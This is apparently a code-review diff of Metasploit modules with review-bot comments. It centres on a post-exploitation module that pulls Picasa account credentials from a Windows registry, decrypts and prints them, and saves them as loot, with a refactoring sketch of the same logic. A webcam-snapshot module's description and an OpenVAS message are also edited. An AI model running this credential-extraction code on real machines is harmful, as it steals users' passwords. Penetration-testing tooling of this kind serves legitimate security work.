- password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\",
- 'GaiaPass')
-
- if username != nil and password != nil
- passbin = [password].pack("H*")
- pass = decrypt_password(passbin)
-
- if pass != nil
- print_status("Username: #{username}")
- print_status("Password: #{pass}")
- secret = "#{username}:#{pass}"
- psecrets << secret
- end
- end
-
- #For early versions of Picasa3
- username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
- 'GaiaEmail')
- password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\",
- 'GaiaPass')
+ username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaEmail') || ''
+ password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\", 'GaiaPass') || ''
 credentials = Rex::Ui::Text::Table.new(
 'Header' => "Picasa Credentials",
@@ -107,29 +86,55 @@ class Metasploit3 < Msf::Post
 "Password"
 ])
- if username != nil and password != nil
+ foundcreds = 0
+ if !username.empty? and !password.empty?
 passbin = [password].pack("H*")
 pass = decrypt_password(passbin)
- if pass != nil
- print_status("Username: #{username}")
- print_status("Password: #{pass}")
+ if pass and !pass.empty?
+ print_status("Found Picasa 2 credentials.")
+ print_good("Username: #{username}\t Password: #{pass}")
+ foundcreds = 1
 credentials << [username,pass]
- path = store_loot(
- "picasa.creds",
- "text/csv",
- session,
- credentials.to_csv,
- "decrypted_picasa_data.csv",
- "Decrypted Picasa Passwords")
-
- print_status("Decrypted passwords saved in: #{path}")
 end
 end
+ #For early versions of Picasa3
+ username = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaEmail') || ''
+ password = registry_getvaldata("HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\", 'GaiaPass') || ''
+
+
+ if !username.empty? and !password.empty?
+ passbin = [password].pack("H*")
+ pass = decrypt_password(passbin)
+
+ if pass and !pass.empty?
+ print_status("Found Picasa 3 credentials.")
+ print_good("Username: #{username}\t Password: #{pass}")
+
+ foundcreds = 1
+ credentials << [username,pass]
+ end
+ end
+
+ if foundcreds == 1
+ path = store_loot(
+ "picasa.creds",
+ "text/csv",
+ session,
+ credentials.to_csv,
+ "decrypted_picasa_data.csv",
+ "Decrypted Picasa Passwords"
+ )
+
+ print_status("Decrypted passwords saved in: #{path}")
+ else
+ print_status("No Picasa credentials found.")
+ end
+
 rescue ::Exception => e
- print_error("An error has occurred: #{e.to_s}")
+ print_error("An error has occurred: #{e.to_s}")
 end
 end
diff --git a/modules/post/windows/manage/webcam.rb b/modules/post/windows/manage/webcam.rb
index 6b838d04aa..aab47587c3 100644
--- a/modules/post/windows/manage/webcam.rb
+++ b/modules/post/windows/manage/webcam.rb
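Review bot: The Picasa 3 block added in this hunk is a copy of the Picasa 2 block that the previous hunk (`@@ -70,33`) rewrote, differing only in the registry key and the label in the status message, so the lookup-decrypt-print sequence belongs in one helper called once per key; the `foundcreds = 0` / `if foundcreds == 1` flag should also be a boolean (`foundcreds = true`, `if foundcreds`). The pre-existing `rescue ::Exception => e` that the whitespace-only change sits under also swallows `Interrupt` and `SystemExit`; `rescue ::StandardError => e` is the conventional catch-all. get_registry begins in the previous hunk. A sketch of the helper and the loop that replaces both inline blocks:
```ruby
      foundcreds = false
      {
        "HKCU\\Software\\Google\\Picasa\\Picasa2\\Preferences\\" => "Picasa 2",
        "HKCU\\Software\\Google\\Picasa\\Picasa3\\Preferences\\" => "Picasa 3"
      }.each do |prefs_key, label|
        creds = picasa_creds_from(prefs_key, label)
        next unless creds
        foundcreds = true
        credentials << creds
      end
      # … unchanged: store_loot / "No Picasa credentials found." / rescue …

    # Reads GaiaEmail/GaiaPass under one Picasa Preferences key and decrypts
    # the password; returns [username, pass], or nil when either is missing.
    def picasa_creds_from(prefs_key, label)
      username = registry_getvaldata(prefs_key, 'GaiaEmail') || ''
      password = registry_getvaldata(prefs_key, 'GaiaPass') || ''
      return nil if username.empty? or password.empty?

      pass = decrypt_password([password].pack("H*"))
      return nil unless pass and !pass.empty?

      print_status("Found #{label} credentials.")
      print_good("Username: #{username}\t Password: #{pass}")
      [username, pass]
    end
```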
@@ -16,8 +16,8 @@ class Metasploit3 < Msf::Post
 super(update_info(info,
 'Name' => 'Windows Manage Webcam',
 'Description' => %q{
- This module will allow you to these things with your target's webcam: detect,
- take a snapshot.
+ This module will allow the user to detect installed webcams (with
+ the LIST action) or take a snapshot (with the SNAPSHOT) action.
 },
 'License' => MSF_LICENSE,
 'Author' => [ 'sinn3r'],
@@ -132,4 +132,5 @@ class Metasploit3 < Msf::Post
 return webcams
 end
-end
\ No newline at end of file
+end
+
diff --git a/plugins/openvas.rb b/plugins/openvas.rb
index 247a0b7a7d..34d8140552 100644
--- a/plugins/openvas.rb
+++ b/plugins/openvas.rb
@@ -530,7 +530,7 @@ class Plugin::OpenVAS < Msf::Plugin
 end
 else
 print_status("Usage: openvas_report_import <report_id> <format_id>")
- print_status("Only the NBE format is supported for importing.")
+ print_status("Only the NBE and XML formats are supported for importing.")
 end
 end
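Review bot: The closing parenthesis in the new description text is misplaced: `the LIST action) or take a snapshot (with the SNAPSHOT) action.` should read `the LIST action) or take a snapshot (with the SNAPSHOT action).`. The rest of the rewording is clearer than the old text, and the trailing-newline fix in the second hunk needs nothing further.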